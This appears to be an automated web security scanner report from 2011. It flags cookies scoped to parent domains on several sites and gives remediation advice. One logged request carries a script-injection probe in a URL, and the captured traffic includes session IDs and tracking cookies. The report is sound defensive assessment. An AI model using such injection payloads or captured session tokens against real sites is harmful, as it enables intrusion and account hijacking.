<meta name="keywords ...[SNIP]... <div align="center"> You can also use <a href="https://www.paypal.com/ca/cgi-bin/webscr?cmd=_flow&SESSION=yk9kRMEwntxWONvVz5hDfJdQ4Ab84eC72ypDIk-pwcTkpw7GO4KCZ1u_aCe&dispatch=5885d80a13c0db1ffc45dc241d84e9538c532da79baccf7c26f850d773643350" target="_self">this </a> ...[SNIP]...
GET /login.do HTTP/1.1 Host: login.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:08:03 GMT Server: Apache Set-Cookie: JSESSIONID=A7BE43B9F2A2C99949EA16FFD7EA773F; Path=/ Set-Cookie: lr=null; Domain=login.wetpaint.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Content-Language: en Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:08:03 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 8775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
GET /register.do HTTP/1.1 Host: login.wetpaint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:08:03 GMT Server: Apache Set-Cookie: JSESSIONID=638DAE29E54D3B65DC1E863BC5F6451F; Path=/ Content-Language: en Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 16:08:03 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 14688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
GET /pages/Login.jsp HTTP/1.1 Host: manage.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=147D97DD3FF5D17C3E11EB54069F4748.manage-n01; Path=/; Secure Content-Type: text/html;charset=ISO-8859-1 Date: Sat, 05 Feb 2011 15:21:41 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
GET /news/software/hosted/showArticle.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 15:26:37 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sat, 05 Feb 2011 15:26:37 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Set-Cookie: JSESSIONID=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 32451
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <h1> <a href="/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-logo"><img src="http://i.cmpnet.com/infoweek/logos/iw_logo_2009_365.gif" alt="InformationWeek" title="InformationWeek" class="brand" /> ...[SNIP]... </h1> <a href="/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-logo"><img src="http://i.cmpnet.com/infoweek/logos/iw_tagline_2009.gif" alt="The Business Value Of Technology" title="The Business Value Of Technology" class="tagline" /> ...[SNIP]... <div class="account">Welcome Guest. <a href="/GLOBAL/btg/iwbtn/user/login.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?keycode=IWKREG&siteId=300001&successfulLoginRedirect=http%3A//www.informationweek.com/news/software/hosted/showArticle.jhtml%3FarticleID%3Dnull&jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" rel="nofollow" class="first">Log In</a> <a href="/GLOBAL/btg/iwbtn/user/register.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?keycode=IWKREG&siteId=300001&successfulLoginRedirect=http%3A//www.informationweek.com/news/software/hosted/showArticle.jhtml%3FarticleID%3Dnull" class="last" rel="nofollow">Register</a> <a href="/GLOBAL/misc/member.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Benefits</a> ...[SNIP]... <div id="h-iwSelect"> <a href="http://www.informationweek.com/ipad/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-spot-ipad"><img src="http://i.cmpnet.com/infoweek/promo/ipad_header_promo_v2.gif" width="201" height="48" hspace="0" vspace="0" border="0" alt="InformationWeek Select - Our New iPad Application" title="Informatio ...[SNIP]... <li><a href="/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-home">Home</a></li><li><a href="/newshome/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-news">News</a></li> <li><a href="/blog/main/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-blogs">Blogs</a></li><li><a href="/video/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-rc-video">Video</a></li><li class="ss"><a href="/galleries/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-slideshows">Slideshows</a> ...[SNIP]... <li class="first"><a href="/rss/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-rss-feeds">RSS Feeds</a> ...[SNIP]... <li><a href="/newsletters/subscribe.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-newsletter">Newsletters</a> ...[SNIP]... <li><a href="/events;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-events">Events</a></li> <li class="last"><a href="http://www.informationweek.com/whitepaper/index.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-twdl" title="Digital White Papers, Case Studies, Webcasts, and Presentations">Digital Library</a> ...[SNIP]... <li><a href="/software/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-software">Software</a></li> <li><a href="/security/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-security">Security</a></li> <li><a href="/hardware/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-hardware">Hardware</a></li> <li><a href="/mobility/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-mobility">Mobility</a></li> <li><a href="/windows/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-windows">Windows</a></li> <li><a href="/internet/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-internet">Internet</a></li> <li><a href="/global-cio/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-globalcio">Global CIO</a> ...[SNIP]... <li><a href="/government/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-gov">Government</a> ...[SNIP]... <li><a href="/healthcare/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-healthcare">Healthcare</a> ...[SNIP]... <li><a href="/financialservices/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-financial">Financial</a></li> <li><a href="/smb/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-smb">SMB</a></li> <li><a href="/personal-tech/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-personaltech">Personal Tech</a> ...[SNIP]... <li class="lastitem"><a href="/cloud-computing/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?cid=iwk-header-navbar-cloud">Cloud</a> ...[SNIP]... (Web address) that has been entered is directing to a non-existent page on the InformationWeek.com website. Please check that there are no typographical errors in the URL. If the URL is correct, then <a href="http://www.informationweek.com/contactus.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN#onlineprod">contact the InformationWeek online production team</a> ...[SNIP]... <li><a href="http://www.informationweek.com/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">InformationWeek</a> ...[SNIP]... <li><a href="http://www.informationweek.com/iw500/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">InformationWeek 500</a> ...[SNIP]... <li><a href="http://www.informationweek.com/events/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">InformationWeek Events</a> ...[SNIP]... <li><a href="http://www.informationweek.com/global-cio/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">InformationWeek Global CIO</a> ...[SNIP]... <li><a href="http://www.informationweek.com/healthcare/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">InformationWeek Healthcare</a> ...[SNIP]... <li><a href="http://www.informationweek.com/cloud-computing/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">Plug into the Cloud</a> ...[SNIP]... <li><a href="http://www.ddj.com/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">Dr. Dobbs</a></li> <li><a href="http://www.ddj.com/windows/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">Dr. Dobbs M-Dev</a> ...[SNIP]... <li><a href="http://www.drdobbs.com/newsletters/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">Dr. Dobb's Update</a> ...[SNIP]... <li><a href="http://www.informationweek.com/government/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">InformationWeek Government</a> ...[SNIP]... <li><a href="http://www.advancedtrading.com/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">Advanced Trading</a> ...[SNIP]... <li><a href="http://www.banktech.com/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">Bank Systems & Technology</a> ...[SNIP]... <li><a href="http://www.informationweek.com/government/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">InformationWeek Government</a> ...[SNIP]... <li><a href="http://www.informationweek.com/healthcare/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">InformationWeek Healthcare</a> ...[SNIP]... <li><a href="http://www.insurancetech.com/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">Insurance & Technology</a> ...[SNIP]... <li><a href="http://www.wallstreetandtech.com/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">Wall Street & Technology</a> ...[SNIP]... <li><a href="http://www.informationweek.com/smb/blog/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">ANTenna</a></li> <li><a href="http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?subSection=global_cio" target="_blank">Bob Evans' Global CIO</a> ...[SNIP]... <li><a href="http://www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?headParams=techradar&subSection=Tech_Radar" target="_blank">David Berlind's Tech Radar</a> ...[SNIP]... <li><a href="http://www.informationweek.com/blog/main/archives/digital_life/index.html;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?headParams=digitallife&subSection=Digital_Life" target="_blank">Digital Life</a> ...[SNIP]... <li><a href="http://www.drdobbs.com/blog/bioPages/author/j-Erickson/index.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">Jon Erickson's Blog</a> ...[SNIP]... <li><a href="http://www.informationweek.com/blog/main/archives/microsoft/index.html;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?headParams=microsoft&subSection=Microsoft" target="_blank">Microsoft/Windows Blog</a> ...[SNIP]... <li><a href="http://www.informationweek.com/blog/main/archives/mobile/index.html;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">Over the Air</a> ...[SNIP]... <li><a href="http://www.informationweek.com/blog/main/archives/wolfes_den/index.html;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN?headParams=wolfesden&subSection=Wolfes_Den" target="_blank">Wolfe's Den</a> ...[SNIP]... <li><a href="http://www.informationweek.com/whitepaper;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" target="_blank">TechWeb Digital Library / White Papers</a> ...[SNIP]... <li><a href="http://www.informationweek.com/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" class="first">InformationWeek Home</a> ...[SNIP]... <li><a href="/newshome/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">News</a></li><li><a href="/blog/main/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Blogs</a></li><li><a href="/software/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Software</a></li><li><a href="/security/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Security</a></li><li><a href="/hardware/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Hardware</a></li><li><a href="/mobility/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Mobility</a></li><li><a href="/windows/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Windows</a></li><li><a href="/internet/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Internet</a></li><li><a href="/global-cio/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Global CIO</a> ...[SNIP]... <li><a href="/government/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Government</a> ...[SNIP]... <li><a href="/healthcare/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Healthcare</a> ...[SNIP]... <li><a href="/financialservices/;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Financial</a> ...[SNIP]... <li><a href="/aboutus.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN" class="first">About Us</a></li> <li><a href="/contactus.jhtml;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Contact Us</a> ...[SNIP]... <li><a href="/thisweek;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Current Issue</a> ...[SNIP]... <li><a href="/maindocs/archive.htm;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Back Issues</a> ...[SNIP]... <li><a href="/sitemap/index.html;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Site Map</a> ...[SNIP]... <li><a href="/edcal/default.html;jsessionid=CGOP4R24L0DGJQE1GHOSKHWATMY32JVN">Editorial Calendar</a> ...[SNIP]...
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.brinked.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.php?"><script>alert(9)</script> HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: www.brinked.com
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <meta http-equiv="Content-Type" conten ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /goat.php?cID=1055&cdid=5144&campID=8&ic_cat=&ic_type=&ic_bu=&ic_bc=&ic_ch=&ic_nso=&altid=US1ffb86d7e6309d5032693db6bb0255e1&refVar= HTTP/1.1 Host: 1055.ic-live.com Proxy-Connection: keep-alive Referer: http://www.rackspacecloud.com/index.php Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ngx_userid=173.193.214.243:1296740518348; pid2=1296740518pY/IXAQ3yw3x99; cvt515=114031401
Response
HTTP/1.1 302 Found Server: pixeld Content-Type: text/plain Date: Sat, 05 Feb 2011 15:17:38 GMT Last-Modified: Sat, 05 Feb 2011 15:17:38 GMT Accept-Ranges: bytes Connection: close P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: sid1055=1296919058yK8mJ7gX4wX1; domain=.ic-live.com; Location: /goat.php?cID=1055&cdid=5144&campID=8&ic_cat=&ic_type=&ic_bu=&ic_bc=&ic_ch=&ic_nso=&altid=US1ffb86d7e6309d5032693db6bb0255e1&refVar=&checkcookie=1&oldsid=1296919058yK8mJ7gX4wX1&docurl=aHR0cDovL3d3dy5yYWNrc3BhY2VjbG91ZC5jb20vaW5kZXgucGhw
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
sid0=1296919303rM7wN0uL4qQ5; domain=.ic-live.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /goat.php HTTP/1.1 Host: 1055.ic-live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid1055=1296919058yK8mJ7gX4wX1; ngx_userid=173.193.214.243:1296740518348; cvt515=114031401; pid2=1296740518pY/IXAQ3yw3x99;
Response
HTTP/1.1 302 Found Server: pixeld Content-Type: text/plain Date: Sat, 05 Feb 2011 15:21:43 GMT Last-Modified: Sat, 05 Feb 2011 15:21:43 GMT Accept-Ranges: bytes Connection: close P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: sid0=1296919303rM7wN0uL4qQ5; domain=.ic-live.com; Location: /goat.php&checkcookie=1&oldsid=1296919303rM7wN0uL4qQ5
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j.ad?site=admeldae&adSpace=segment5ron7&tagKey=4284263595&th=24653211015&tKey=aOmn6ypVMqotYK2q3i2tiFudZblZbX&size=160x600&p=4175931&a=1&flashVer=10&ver=1.20¢er=1&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2Fsearch%2Feverything%2Fthread%3Fcontains%3Dthread&f=1&rnd=4177843 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/160x600/technology-atf?t=1296924234264&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2Fsearch%2Feverything%2Fthread%3Fcontains%3Dthread&refer=http%3A%2F%2Fburp%2Fshow%2F38 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=afngMQmgeEZbPjNuDbDALMmo3LxrsNVq85RU9CrIRUZdxZbLMffS8EeYEZcn7pmUup0yajdeDSkVYIueQUTiTZacRIsdoZaTZbRu4twS2KZcwtZbZdALWY81S9VokXwhGSM2VQaO81ZcCko5T0jO7Qu5G2w0ZdTX4aveAgO3hJ5uU0piogYtjwwHuOWAZdA8uuymtIdQDHo0auQqYNTSw17GstnLXm80eVQopCBdLleZcT4pVTLyW8vfvBLUwMx6NK7HPOyBqf6NcaTN5bmuWO3YZd0H5ZauZcJflu0fLZawJL4RDPv6APyHPq8yvYFL1aB95ZblqR4AFiQ7lZa6jwA88tV0txbtrWXo7hpW4O1M76uwOZaydmrGbZcqsSJnjZdJ98yF9liKpFeuChMCQZbl7LxTf2Mn2WbF3UnvMPvl4mZdlNG236hTKeVTZbl6c7QOXwEyDiM1gkX1cHcRPFYSYMnIrimGSUQGMhxZbrK
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /server/ads.js?pub=6552261&cch=6553220&code=6554751&l=728x90&aid=25478846&ahcid=644815&bimpd=5RYIcSzcZ3YVc3Xmn1v6D12fgxoMZ_KxYaGHrJIk6w4vL2w4olBgZlcwX-dfSgko6HDZxnsmrr47Obp5SaAxhaWtejM1oKx9QhYTUwPwtNKBMLFYxb2xM7L9ijs99d1ugjauT2d9OwYgSUGCBVCSDBA8RKHDwnb6YyAiXdTaEUKKYyoJCu690_v7VpvZCDjUaKJtXRsJH9xiIAFWKpwwM6UKT5iIY2cCh4o0tzZIqH-QoZWIeSd46jAx302zPvjENdQJQ3lxJmiG3xwERk51EwRDwJvkeElJ0kedc5pYI2g5SKdz39rSLSTWocZyVeeF7ql5U8dtGEkuqVxzMGVpJH8T-ZNFEU-nOUpnOCu9QLW6GijLKm6S4m4J2fUPbtSxkcNYq2VuxeX6OfYPUyBZcqDsMS9X-ilW5sENh-d4wjE4YSkth278wvcJbt8t2bntfdFR9R2deteLfRAQWVOy3LRNf6UxlXDZ3bwY5OTvFqTA1c6M99vGyI-JTgtVkKU_-gTnqRHH7p3tSij6x55gE8GV3EQmUWZL1qF4AqtpmSku1oehzJHvQLZhAry7fGCDbPDC_UsTdQlbYxb3dg3wgqohEMsFISfvjV_1K2LXvTMeR9vPL1IBCZu1g6Tc8JYuNVt2lXohf7sOVYPfDrMXhw6e0ejzFihvNy98WKBwGnOlER_WzsdjlkS_niAQAk_DTV2G0EBCwswsTXB9DnU_Xwv1TTF4CsEb1q3yNhJPgzs&acp=2.16 HTTP/1.1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; adImpCount=XCTjECTrmWdJQ_G6-J-ejMSkLbSi_jJrYay0ywYz-cvfaqaDzVRu9ZiuBStYaftYY9n9GIWJHDTqbWbTuEexfB69AzG-1xnimSe3mxh_Bu-8ubKb1mcJBDfkXEAFXrrTDHBbK1PfWBmpT0WKSQe3TUkPR4fWKjb3yyWVk5dMIxGJdtQ4XjywY6M_WGEYsibJl5m4fDOeiW48y7iLA3KqDJFKzKLmkd44--kKLD5NvLM2y2yusEnAXbE3cKNxL08YE1AeAMlftvoA_hZtxaKiUQat53N7bomWY-BUGUSHTZsFbkhjkvN6nPCM8aIA7j6ZRVkp4MbZruesFmvP235KiUUV8L8R73QQZvS77vFzFS1HOo5mkj6ZZN9iEW-05dPCaXQiZ5MhBSJ0wT7n0JXyY_VbPRZPemAaPIV02V20xAgJcs4f0epcoNbFbrcDFmbzv_3nli8UjWhcvfS0V875YrBJUMOgzeE2ecfHPM3ssyrLwXTRAuAMZaFTPLStSmIkExVqjoiCHSlu6VtSfm1ItnkKYGlIbdkkypZWWgYIEGqlwGQUnBil5lxIxombv7W8_dfeO_n2pI26l-YK6hK5tIX4FrO9ZzR0J9gcNpX6r0lOGK_87tDq8e92tNo34emrLYpxfvFJPhavU3YhPMrKlwE0EG8lb0wpUTx0d-UMHmzcYGCBqeMQhwZX92C1GvcCKL-A0si5lB82Gor_PnYNoX6Xie1t_RW9Fb3L2sHTegM5CRV6Sg0kj2hpeg3YN_OTFb_ykPSfhYq9xB5dvxX9vXdDtoHCSf8D3QXZMJVTGL-QS4BXUw9JKS13fShT8p-nT58teAjyWVm8ZUmCeOy70LQNE-ThqdFUm70Cy69C3oK8555poRnZ1pyrSO5nr5vM6xIKciPUG_L6kek2QAAm2NaEPnEfKNOKzE7IEAUPag9Ru_fmnuOn7vvqoBU15ZmhQlqU3ASJzSki2FqM-827pDlQxnots3TJQBGD5zBeybJDUWJUS2qE5xbSfgGJkK8ECJLwUPH5m6fGioSNL9hUF1M4At-mEES-WC-9xjj3t3f_ulQ4mT0ARQVfuNBTCXBRYV5TDlYmy2Z8qrK8HABRL4KQZMWzmY_WJ5kOCNWK9jjBBpL2hkwJZCmnwVoZUxhv21kHVwPmLQHaaZ8WjJTXZOFX3s61htW8gzufrjzS8UYI4ul_k_qxXYWLUcarN-OPmuZSzKGqNEN1jwBY50JNOtJFIv1-_kSKSfgApdTg8aySxk4IEA9Y9DBKfZi51eRQ1T8DgceqM6b1vBiq5t5N4cOOOGDtxgqiLa5bg_NkB3a7k5rKHuQQZIGRStF_s_-zd9B75dJIlXKUz0SbsOk1O_XYU-iBcAPXSuHLZOItJWK_q7kcszzdC-4WXXiD47mFkq-kLpEPe4AqzeeCfQ07NaXtGsOmQBlKzOQ33ZGMpw72-emXqsW1NGUYGSgfqbNK3wsU_sTtUbm1SjVKmPjiwwAu1wmxHYdgjat_8LrQjuZS5j8iiYwlp7O3berwpZoTTwcrBY1FAZwpdOvB7rhNncCUAqrujLIRDDKB9A4rwTiqnW19YtWWHej7r8e4mH8A6AO5DXm2OFu_JoJbS7kNCeGRPd2Pu67I0jtdYDoQtISZIuOOs5QBUBFO6Ux6eBdesQG7e206iUCMr6G4ReuYv9qu2brv6xOaOHF22JTE6fSTWs1vqbdSBTqljjRlb1bI84tTNCPN3BqENqT_zZ3J0qfx8rohXradE6gfv0klcRvwir1R8zL_M6TnYCUpn4oZBsVmy8Ub2tfFilW-P2zv-Aueocyz5z4Zh4_TTFn-uArtGjzhWgb3FdBVEWyiVjApCp_ktS9KS-0RMXF1l7ESjegYMXaBPTTmd2WgV9gctpB_Jnxr8fyBFOmXyUzC6SM-3DOG_cNiBPFvxMhzQJQoEtk6Kf0Knjxrmhgg149tgjmFuqSIGT_-krOeN7vLZ2mni1zUvWcOM88gz1HkCNrE0iy_B4p-MYtz0u9Osc0hcM7cM7O4MPAb1WdUreDtlEfzyXvNyw4jC3AUMtLYLCeHBtyh4OssOBKvaPrprBKf23U092jF6nF-MeVAGqltYFYSkkX75I5VROI9OJpOqPK8kARWzJaywSFrevPAfrNYMXgR5ip14B4AOR7oPof1oJeJTrrpWXNRNbQYYmEOAPiSSQ4jNJppbiZU2lJrlYLsyRSM1k4HYAuPlVbkwJzXsVYwKkRXVFex630s1J9JnG4kYN8pTpE9m4YgpaGu43OlXjUSFQSrrn8Nudo7mcLVj2OOOYvzaa4GGXOgzyfVtyjoCfaT-NjHIX3qqhfNVgJs3-ahZ1x1neIfPYtR1qZkxRW4rBECOq2NalrwOW2ogFoOuu8ndNQGOgJGVravklcWXSDXwnU2EaM3sLlSWaONPYyGPrOdQAB1Xu-loRZKbNwT4nQRtnOWyedajZAq7rcoIo4VJbnmR9_UbpJ9223